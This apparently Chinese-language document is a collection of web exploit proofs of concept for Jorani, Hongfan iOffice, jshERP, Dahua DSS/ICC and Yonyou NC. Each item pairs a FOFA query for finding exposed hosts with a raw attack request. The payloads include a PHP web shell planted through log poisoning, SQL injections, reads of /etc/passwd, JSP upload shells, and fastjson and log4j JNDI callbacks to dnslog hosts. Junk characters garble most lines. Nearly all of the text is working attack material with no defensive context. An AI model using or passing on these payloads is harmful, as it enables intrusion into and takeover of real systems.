GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# Q0 V9 `# C, D3 [
Host: 127.0.0.19 z" W/ B) D/ A9 J+ _: v# L8 P
Pragma: no-cache
2 R* U* h8 p ]7 O o; \ TCache-Control: no-cache
4 t7 ]% G/ V5 K4 \Upgrade-Insecure-Requests: 11 G$ ~ N; N5 D, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ j9 b% U% k- s, v2 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 d& X0 R. W4 c8 ^* A" [! \: XAccept-Encoding: gzip, deflate
9 J/ ]" M% p* m, o g+ q' i( KAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 m( m. Q5 g8 Q7 ^Connection: close6 B1 O4 j. b! b
! f5 o5 H* `: @# N
7 c) N! e) j: Q" x3 e' s3 J
12. Jorani < 1.0.2 远程命令执行
0 P. X: j& `" h' s5 p& UFOFA:title="Jorani"
2 M x. H: Q$ f第一步先拿到cookie, d8 e' l8 n- w; A
GET /session/login HTTP/1.1, m) k( s1 W& |
Host: 192.168.190.30
- ?1 B4 Y( K, G9 n9 q3 \- xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36& c. ]1 n! @0 T/ h( m' f
Connection: close0 m# H( K# H1 b
Accept-Encoding: gzip: r, L. \" y# l' |" z
* G( Z6 C4 r* p( E n% g' H
& D3 c' H5 `4 f, e. [响应中csrf_cookie_jorani用于后续请求
' { r/ ^6 ^7 V2 ~. \( ?: J$ P5 D& `HTTP/1.1 200 OK
+ u3 J) A) [; v+ IConnection: close
1 t& O9 }& u0 l$ h LCache-Control: no-store, no-cache, must-revalidate
& R! H/ ?8 r) {- }& `& w' U+ P) dContent-Type: text/html; charset=UTF-8
' d* O. _4 K+ I% pDate: Tue, 24 Oct 2023 09:34:28 GMT. I. c, ?4 {3 a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
$ R( A$ m$ D: `3 g( CLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
1 ~( U- i0 j6 @Pragma: no-cache7 ~ L6 M0 r" W9 M! P. P6 ^, B
Server: Apache/2.4.54 (Debian)
2 i0 _) r& Y' t8 Y, f6 FSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
% \2 [, I2 l0 r8 s0 b9 {Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 Z0 ^1 H( F' A1 n* c* I; JVary: Accept-Encoding
1 r/ n' T) a* L5 z
: g2 U4 ^ ~' N) |
: U1 e- g3 t ]- \$ xPOST请求,执行函数并进行base64编码+ \& E) g: a/ U
POST /session/login HTTP/1.1% J. E/ z; k: l& G; t
Host: 192.168.190.30, r$ Q, l+ O1 r0 }5 N( L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
) t4 P- b1 @5 [" x9 S% e) iConnection: close9 P9 u6 Q8 f4 ?4 A- o8 ]
Content-Length: 252
; j; V- E2 V- m' |* A( ?" g' rContent-Type: application/x-www-form-urlencoded
9 u/ s2 n& @0 {0 ~$ p3 qCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 \% ~3 |1 a, F& h5 D9 BAccept-Encoding: gzip
5 g2 ~8 Q- N( s9 J' [
" b0 n: W2 h+ |. p4 B! m# Ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
4 ?% f( C1 l, D4 H F% o* U6 Q( {. |- Y$ m& a/ E
. F; d+ H- {& V$ |: P$ R6 F. B
3 I% {: }0 f! |4 ], R& D, v) O向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
3 W+ i8 P2 B( k9 @+ V! `: mGET /pages/view/log-2023-10-24 HTTP/1.1
' g8 T0 n1 U. z7 ~" |Host: 192.168.190.30
9 F" |0 D6 F) g7 _. n& v6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! P( I3 x5 l) v4 |# m9 r' U/ k6 [Connection: close) C( ~8 j( j/ |
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ g- L# E( Z" S0 L# y9 @
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 B& C: F, o) }8 v4 h3 @
X-REQUESTED-WITH: XMLHttpRequest
/ M* ?1 t1 w# k$ E; m( i" x. _Accept-Encoding: gzip
2 N8 ]3 n2 Z9 H4 R$ b
+ X; w, |! }- [/ ^/ G& L& i) s" M# q c) e4 p6 X
13. 红帆iOffice ioFileDown任意文件读取
: R0 S i. k$ r3 J* B; l; o6 lFOFA:app="红帆-ioffice"
2 c9 L: {2 R: kGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1/ [! W1 t! M& B8 L% _* z7 s
Host: x.x.x.x$ N+ _& _% f' ?" r! k/ Y* R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( K: t7 K& Y L# W: B) p( z
Connection: close1 c1 \2 X" @9 E0 \% _
Accept: */*. o% p2 Q1 ^: t; Q+ c! h
Accept-Encoding: gzip, @& p) d3 H+ s9 |. |% @* I5 l
2 k3 a( Z+ y8 D6 ^
9 }6 V5 w( d( ~7 q- I8 Q14. 华夏ERP(jshERP)敏感信息泄露% b+ v4 K/ x, m* H6 m, U" s" T
FOFA:body="jshERP-boot"2 q! x5 b7 y$ Y8 c. R0 R- [
泄露内容包括用户名密码
5 m# R3 _- q. L, m' T! _8 r' h7 JGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) W6 I( P7 J. u9 z; _Host: x.x.x.x) L) Z2 R. z7 e- o+ {# Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* N& [ i s/ a5 f* G6 n
Connection: close( R4 q, `. R5 e4 W
Accept: */*
; m- M' \9 }! _* J. ^/ Z! IAccept-Language: en5 X% o. F- j2 k/ y
Accept-Encoding: gzip
" U/ `7 V* K0 A( m" R3 u5 H
, |7 l) Q# w& v' C" [- k* i4 h* c. O0 u% R) J& y( Z
15. 华夏ERP getAllList信息泄露" g, z: E/ }4 [- [: z7 R
CVE-2024-0490$ z( S9 z% `: j& Z. c* a
FOFA:body="jshERP-boot"! O* ~1 V9 Z7 o8 y! e+ l
泄露内容包括用户名密码 I" B. O/ e" @3 P p* Z
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
" G# | Q w0 y- n( N, x' c8 i& oHost: 192.168.40.130:100$ X7 T* g, R( b0 T4 R7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.364 B& w1 s7 i6 ]. J) }+ a- q* T
Connection: close# i$ {9 q+ q# v' h" w3 ]- d6 f
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 c3 M$ L& h; Z: a8 E2 L6 b+ YAccept-Language: en4 W% M! {% p0 G: g9 P" b
sec-ch-ua-platform: Windows5 _% b$ A8 d7 \/ a( a! M) M$ B
Accept-Encoding: gzip
8 W1 }) h' v: G3 d
8 }' Q9 N( x3 |0 o! T' w [
0 t8 _1 h% R0 K& D0 T" D16. 红帆HFOffice医微云SQL注入8 S5 p0 M9 [3 U- K! u9 _
FOFA:title="HFOffice"* n& s# J/ ^' L# }/ O) s5 I
poc中调用函数计算1234的md5值' h* z8 E Q) _) @7 _4 T' r% z
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1, u8 z5 e1 {+ `2 |! _4 ?6 o
Host: x.x.x.x
) F/ W$ g3 q! ~3 dUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 O/ r* l' B! MConnection: close" h7 e& c+ }: I% i
Accept: */*; v, w3 w9 y/ h7 j; z+ b7 i$ I
Accept-Language: en1 a0 s! |3 p% Q8 D! G9 [' G% `
Accept-Encoding: gzip
' o, h0 a0 J4 Y J1 F
" w& h+ @+ q, \" {8 d8 @; v3 V2 @2 i
17. 大华 DSS itcBulletin SQL 注入
- S2 q; B- B1 h, T' I/ vFOFA:app="dahua-DSS") w0 C( N, s; i% m+ S+ J
POST /portal/services/itcBulletin?wsdl HTTP/1.1
+ `: r# G: `! ^4 `* a# v( YHost: x.x.x.x
* r" J* k' R/ a: P% \2 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* _( `% f) V. [! z- fConnection: close' k4 } ^4 g7 c4 y3 ]) z+ x5 j7 O+ f
Content-Length: 345
. Y9 A, F1 ?( P# V4 W# L! rAccept-Encoding: gzip/ ?: ]/ H; X+ e/ r$ x4 x! t, @
, Y. Y" m+ Q9 C' T9 W
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>- i0 e* W3 R) ^. A) v9 S) y7 a; V
<s11:Body>" Q5 t8 V! F2 L6 a3 z
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
5 m3 C% f8 c$ z6 I; P <netMarkings>8 k+ K" P9 h0 H- w4 s0 |
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ e6 {1 k5 V0 D, s2 h </netMarkings>$ u" w4 {/ c8 p; _
</ns1:deleteBulletin>$ d5 }# c6 y X% t
</s11:Body> n+ O y/ F- V3 N, X; r; k' M
</s11:Envelope>8 n, n) S- l; ]- _% {& s- v
) m# }& k, X; n- z! N; Q: y
" g" k* P6 d4 `: Q, t
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ ^8 Q% o& l `" H2 F
FOFA:app="dahua-DSS"
6 j3 }2 i$ K9 x# w( ?8 mGET /admin/cascade_/user_edit.action?id=1 HTTP/1.17 V6 {7 g6 y9 W; ~4 r* ]0 @
Host: your-ip2 R% c! b1 v% x8 r) i( L% L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 G" W8 X6 v1 RAccept-Encoding: gzip, deflate
! O; u/ ?) u6 ?3 [Accept: */*6 x8 K2 y o* b+ p
Connection: keep-alive
6 _2 ~% N9 h1 q: K, V4 X% e/ n( p
1 |/ o0 I: c7 ^1 J5 a {
" F9 r. i# I) ], c5 ]6 f, {" u# E1 E9 f' Z1 H Z {
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入( h; G# s% a0 g; p+ {$ j) M6 n
FOFA:app="dahua-DSS"
. a' r' }# p$ F0 K0 b7 V1 vGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.12 |! F/ ?! Y& |% G) ]+ s( m
Host:
& a8 Z2 U) X3 }- b" k9 jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 M/ l6 Y% S2 \Accept-Encoding: gzip, deflate
+ ]0 V2 C6 h+ J! ^Accept: */*
1 d( }' a+ G( `6 ^$ e3 ?# NConnection: keep-alive
0 r4 R( r8 N3 u0 n2 O m# M* n/ m* _6 W/ y
' p! t. y4 r" i( |1 M& m6 V20. 大华ICC智能物联综合管理平台任意文件读取1 [; Z9 ?/ I. J
FOFA:body="*客户端会小于800*"! V' y9 T5 E* @2 [/ b; Z5 p
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1: U, {, a) W+ {7 z! s
Host: x.x.x.x
6 _& ?4 E1 k( _! M0 M) ^2 `$ PUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; f- `7 H" U# BConnection: close
; ~- ^) }6 M% T' _Accept: */*6 _" f% H, {8 \" e7 c$ U
Accept-Language: en: b+ T' L7 w# m; [7 B: R. ~' t
Accept-Encoding: gzip2 P" V! `( \( @; H. _8 {: }
! @4 P$ C3 f# {; _) s6 L8 G
! O- N. o/ T* w3 Q# q, z$ M
21. 大华ICC智能物联综合管理平台random远程代码执行1 b/ O5 `0 V* o0 |3 C
FOFA:icon_hash="-1935899595"; @ M( y3 f( G1 D9 P' M7 e
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
+ v' ^/ R- G# w0 Y3 I0 eHost: x.x.x.x
) r+ k+ m" F2 ^; ]& ~ _3 P# l# T* @. JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) r. ?$ k, [: [) z4 a
Content-Length: 161
+ \8 o& C% o' B3 Q% mAccept-Encoding: gzip& ?4 A1 s3 r8 u( \6 o% B
Connection: close
$ v) o2 O0 Y1 `* N/ n- Z! yContent-Type: application/json;charset=utf-8
0 z$ r5 j: l @& w# J" C7 i4 ^7 C" l) R% D
{
- x/ E; M' Z; p! \% [$ {"a":{
, _$ q8 P" W; Q, }/ d "@type":"com.alibaba.fastjson.JSONObject",; H4 l" c7 T5 i7 ^+ G5 L6 B2 u' B
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% h |& F& V; ^
}"") T i) R' L! I( Z' [ d- S
}8 p( I8 ?3 t" ^8 b& t
4 |8 A- a$ Y- A# x! D- L# g9 a) M7 x! r2 e4 R
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
K+ {6 v& b" jFOFA:icon_hash="-1935899595", o# P3 E+ S/ L( o# n2 K1 p! C
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
3 G, {% B, O4 y6 [# KHost: your-ip: b7 w Z/ @1 w7 P. l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! c! _0 _% r o* [. w- G @Content-Type: application/json;charset=utf-8
5 ?" z+ E$ n; R' y: j( Y: i7 e. u; T! r" G
{
: J4 T$ Q% u9 x- z2 i( A; J7 t: K! L"loginName":"${jndi:ldap://dnslog}"- w+ G5 C- U. f- F# W
}
8 a! T2 N, v5 y9 o: b* @
! N: g: _& \ u0 J/ Y
3 x2 V( O1 H5 f$ e* D' G: w
, h2 R7 u& E e v23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 h& s0 e# K; W, ~5 S) T+ }FOFA:icon_hash="-1935899595"
- r3 Y9 M3 D: OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1) R. |. Y1 R: I. O- l, u. @9 p
Host: your-ip" |2 W/ N! F1 _) \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- ^- l: f! q( x8 N; [$ ^& f: VContent-Type: application/json;charset=utf-8- {- F4 O/ W1 g- J
Accept-Encoding: gzip# w+ f, ]3 K& H, T/ K1 a
Connection: close
5 a1 ~# \9 Z0 H# m% D$ j, s& l6 J. `& ]- u
{0 T! |6 j8 f0 z5 J
"a":{
4 p; B4 p, K4 |7 L% l& K "@type":"com.alibaba.fastjson.JSONObject",; I' N! N# e: Q2 _
{"@type":"java.net.URL","val":"http://DNSLOG"}
/ R2 s9 C! e; i$ F% Y! G2 a }""
3 V2 n8 m1 f# c+ P& t+ t}0 c6 i7 ^' S+ O- C/ F' d
, N) g. Q% I* k- A; t( v; y% i# [' V* V
24. 用友NC 6.5 accept.jsp任意文件上传
9 N7 b8 C% p" oFOFA:icon_hash="1085941792". Z# e0 ^( ] ]
POST /aim/equipmap/accept.jsp HTTP/1.13 M* g+ p- H" B4 U
Host: x.x.x.x
9 Y5 t5 N0 F5 N" `5 yUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36$ D. }4 p7 O1 ^: H
Connection: close
" ]+ m, j* W1 N0 W9 T, tContent-Length: 449* h5 F/ F' F4 M; p, _/ |
Accept: */*' v$ P# n; s3 j/ g$ S5 z$ l
Accept-Encoding: gzip a$ W+ n! ^: Z+ h
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' ~8 J3 K; E4 W
+ T2 k2 E1 ^# o+ s0 N; V
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ Z1 l, K0 n h% u$ p0 i
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
9 E# ~% i7 x2 _1 X6 DContent-Type: text/plain: k5 H2 @1 z; ~/ \* Y9 r- m
& h {8 ~: I+ ^7 ^<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>! z' q: J- |/ `
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 ^7 B$ a; M [0 o
Content-Disposition: form-data; name="fname"( ]+ v- f/ [% p; T5 v
- V @+ }, ?6 i4 i1 s, J& o; A7 B' g\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
3 u2 ?, B$ M- ~-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
/ Z$ S' {% r: T7 @# e) I# j# s
7 D: N& J. k% u( Y
; [) ^$ C! H$ a# v9 a B" t25. 用友NC registerServlet JNDI 远程代码执行
# ~& p6 A8 `* V( U( |- B8 UFOFA:app="用友-UFIDA-NC"
5 A F0 e% u) e sPOST /portal/registerServlet HTTP/1.18 }9 T" P0 V+ u6 U' e0 e
Host: your-ip7 {3 p( H4 b6 Q, Z$ d( H, D$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.00 q6 c. ^1 X) C% M5 g; v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
& ]2 D( c1 _* c; \" V `1 ~Accept-Encoding: gzip, deflate
# V( l& G3 s, T1 ~; `/ n7 l# {Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6( Y3 j4 N# Q u, c
Content-Type: application/x-www-form-urlencoded
* d/ S( }. K$ u( V. O
) |' I) Q: S$ P' rtype=1&dsname=ldap://dnslog) A& [2 d: r7 b
* H6 G6 \' g3 g7 |
$ S0 f( Z, T! |% ]. g7 Z* @( }
: S+ D. X* |% o: ?: h7 e" z4 @
26. 用友NC linkVoucher SQL注入. I' w3 a3 D" X* o; Q3 Q" B
FOFA:app="用友-UFIDA-NC"- ~, q# o2 ?! b# }; V
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1% q% j' S: a' j% w: d. \" a
Host: your-ip
) @# n1 [8 n7 q( D8 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 E5 `; y, d3 x( E" p
Content-Type: application/x-www-form-urlencoded; N6 h" V4 L4 V3 r( C" K: ?& n0 O
Accept-Encoding: gzip, deflate
8 ~& i" c# a3 n) V: L/ x2 `3 b) Y% OAccept: */*; ?2 x6 k3 Q* ^/ K* \2 y& a
Connection: keep-alive
5 J9 @' N$ L" H. a( U) R
; w7 D9 u/ i( u: A5 u( D
6 T: G7 F$ w( D9 B27. 用友 NC showcontent SQL注入
, G+ y. z4 v, H7 A9 @8 W% kFOFA:icon_hash="1085941792"% T. z! I' ?% b2 v0 ?. K1 Y0 D
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1; ^4 S5 y/ S5 r9 Z2 c
Host: your-ip
' T% D: `$ B4 A. ^8 u5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; Y6 @" a; B/ x" [' a, z9 ?/ I
Accept-Encoding: identity
+ Q5 p( q9 ~# I* xConnection: close& [5 C& ]! F7 G7 O/ E: `
Content-Type: text/xml; charset=utf-81 ]) M3 r: f6 F
- S/ P( P+ ~$ X# @" f
4 H5 o5 q9 r5 y7 _( @28. 用友NC grouptemplet 任意文件上传( x) p$ J; q- m4 x( S# M' \
FOFA:icon_hash="1085941792"" _6 h6 Q: A1 \+ R4 {
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.13 i8 G" _, K3 D& Z9 ]. N2 S) H/ H
Host: x.x.x.x6 s! `/ J9 L2 U F! n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! k6 d! n5 K) t! hConnection: close
" W# M7 l$ c7 O7 iContent-Length: 268 I1 N$ m% M+ k' W. b4 B
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk1 n9 S! I5 B9 |- H f
Accept-Encoding: gzip+ F4 F R2 L0 z; f# T# J% b' W1 K
, T# }# E; {$ W
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% h- `; G7 b9 Z# R% @8 v8 LContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"7 X9 O5 Q9 R! i: l* q3 }! S9 ~! T- a
Content-Type: application/octet-stream; t1 f# _ p9 A7 X' u1 n2 Y
" g) y% ^4 E- B+ v/ y
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
) t3 _8 _. C% E8 U+ k# q------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--: v$ N' v: h1 ^8 G6 `& c" @7 z
& q: i+ Y; s3 R
- _1 y/ Y6 y9 a) m2 b& e
/uapim/static/pages/nc/head.jsp
2 j7 c }$ X- l) c( u7 i5 X& b3 w- G/ _) r9 h
29. 用友NC down/bill SQL注入
$ ?' j4 S6 k P4 TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 n' A4 Q0 s; YGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. M2 J- L' z: \Host: your-ip
' J# C) P8 H2 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 h$ p/ g) G% D% B" V. B3 k* L
Content-Type: application/x-www-form-urlencoded
% @3 b0 [. { `7 [" ^) rAccept-Encoding: gzip, deflate
2 T' e7 _8 H3 ?; [' |Accept: */*, ^% M8 w7 m8 a, t# m) s$ \
Connection: keep-alive
- Q, X: @( ^& [" l0 z4 P& I
4 D- t% R/ u3 V; Z& M$ o4 s+ Y& V& x/ s- |: B2 x/ ?2 L; y
30. 用友NC importPml SQL注入
2 l1 a1 ^# {( w- j( ^FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 S' X0 s, o$ L, G3 i3 Q/ x
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1' O* g2 _& K' U. t4 `) G! ^6 `2 P: {
Host: your-ip5 h) F& |) D: |' E0 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V6 t( v, A* E( G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
& |3 h$ C% b/ |3 M) }Connection: close# c" O; `+ l7 v' Y0 `& W' H
( j# p- a# a, D/ `8 b) ^! k
------WebKitFormBoundaryH970hbttBhoCyj9V/ u- w% R2 h# {# }$ ?' s" z
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"# J2 X: N; L; L
Content-Type: image/jpeg. [+ v& p/ u- r4 X' A% G$ y1 G% g
------WebKitFormBoundaryH970hbttBhoCyj9V--& k$ O) l9 [* a7 W( L
; A* E5 R' }6 U1 t2 S9 A
9 o4 D3 E! e, l5 G' x& @: |& @31. 用友NC runStateServlet SQL注入% N( U3 j; a- e8 Q8 I" h4 e
version<=6.5$ ^" W$ n% j; a7 d
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
3 H& a1 _6 j( d* |% D% D, v! g2 @GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ q! }) c2 l5 `2 W7 _& d9 }Host: host/ |. v) j- C* a) U2 \% k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 x, h& }4 f: J% t( D+ c1 O, ?Content-Type: application/x-www-form-urlencoded! Y) w# L: t( v" X- m7 d# l1 V
" b( S; H$ T. N x
6 {2 |6 y& c2 E8 W5 j3 w1 T32. 用友NC complainbilldetail SQL注入# y4 [% Z7 n4 m- ]8 Q6 |4 _ w" x
version= NC633、NC65) D1 }2 l; }; c0 g( T2 F
FOFA:app="用友-UFIDA-NC") W: ]4 d( j/ k" |6 c
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) u- b" S7 M5 P! ~Host: your-ip1 u W5 |! W' x+ e. e i6 h& \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ Z9 p L* J0 d L$ u( k2 kContent-Type: application/x-www-form-urlencoded
& E0 C1 A$ v# t4 lAccept-Encoding: gzip, deflate
- l4 _) m6 ^% b; vAccept: */*" y$ ^7 H8 H/ p. P
Connection: keep-alive
. M4 b: A! f" J+ O; s. g% w \' H& Z2 `; z/ `. q8 x
3 \% n0 ^# s v7 H33. 用友NC downTax/download SQL注入
4 d# C& ]9 u$ P V; Sversion:NC6.5FOFA:app="用友-UFIDA-NC"& I7 {) R' [- v6 A3 i
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1- I1 a+ ?* P) W; m
Host: your-ip7 x5 S* u8 v5 C0 D7 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ]1 s/ O. _' r! jContent-Type: application/x-www-form-urlencoded6 ]# E3 o j- `9 }! f
Accept-Encoding: gzip, deflate
& f; ?: o6 H4 [6 A( _Accept: */*. l& g2 v; s. _6 U' s0 G
Connection: keep-alive
6 M; F z5 Y2 V0 r+ N
: W% ?/ ]2 l. T9 A8 U. ~0 ?( P- j+ \/ p( w: w
34. 用友NC warningDetailInfo接口SQL注入
: k* V8 @5 z P) u5 n) _FOFA:app="用友-UFIDA-NC", ~5 U" f8 H( a, u! b6 F: o+ S
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% I {8 X7 N; x; {. K/ A) D; IHost: your-ip/ M, I3 y4 N$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" \ C {0 E$ t6 Z" A) r1 BContent-Type: application/x-www-form-urlencoded
9 i; n7 _ w& w8 \! H/ qAccept-Encoding: gzip, deflate% K6 M/ m% R7 \8 n4 k
Accept: */*
9 j7 n8 @+ `- `) C4 m5 U5 @Connection: keep-alive
) |8 j; X" p6 M0 n* v1 Y6 s( c( C
* ?0 J/ J6 G# \: b- a
35. 用友NC-Cloud importhttpscer任意文件上传5 o- @3 C$ {. {$ v
FOFA:app="用友-NC-Cloud"2 U- }, U% ~- u, x/ H
